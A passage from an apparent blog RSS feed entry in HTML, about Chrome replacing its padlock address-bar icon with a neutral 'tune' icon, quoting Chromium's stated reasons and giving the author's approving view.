seem to be able or willing to provide. But, without further ado, let me introduce you to the replacement for the padlock icon!</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-2.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="288" height="288"></figure><p></p><p>This will be hitting desktop variants of Chrome from ~September 2023 and will be following on Android, but not iOS. For iOS, the padlock icon will be removed and will not be replaced by anything. The reasons for choosing this particular icon given by Chromium are:</p><p></p><!--kg-card-begin: markdown--><blockquote>
<p>We think the tune icon:</p>
<ul>
<li>Does not imply &quot;trustworthy&quot;</li>
<li>Is more obviously clickable</li>
<li>Is commonly associated with settings or other controls</li>
</ul>
</blockquote>
<!--kg-card-end: markdown--><p></p><p>Whilst I can agree with those reasons, I think one of the most important sentences in the blog post is this one:</p><p></p><blockquote>Replacing the lock icon with a neutral indicator prevents the misunderstanding that the lock icon is associated with the trustworthiness of a page, and emphasises that security should be the default state in Chrome.</blockquote><p></p><p>The issues of &quot;trust&quot;, and what that word really means, along with other confusions around connection security indicators have long plagued the Web, but no more. In addition, the pursuit of a default secure world is one that simply cannot be argued with, and anything that moves us towards that being a reality, including our UI state, is one I&apos;m onboard with. I&apos;ve enabled the new indicator in my browser just to see what it looks like and, I have to say, it convinced me even more that this is a step in the correct direction.</p><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-3.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="1158" height="574" srcset="https://scotthelme.co.uk/content/images/size/w600/2023/05/image-3.png 600w, https://scotthelme.co.uk/content/images/size/w1000/2023/05/image-3.png 1000w, https://scotthelme.co.uk/content/images/2023/05/image-3.png 1158w" sizes="(min-width: 720px) 720px"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-4.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="406" height="155"></figure><p></p><figure class="kg-card kg-image-card"><img src="https://scotthelme.co.uk/content/images/2023/05/image-5.png" class="kg-image" alt="Goodbye, old friend &#x1F44B;&#x1F512;" loading="lazy" width="460" height="293"></figure><p></p>]]></content:encoded></item></channel></rss>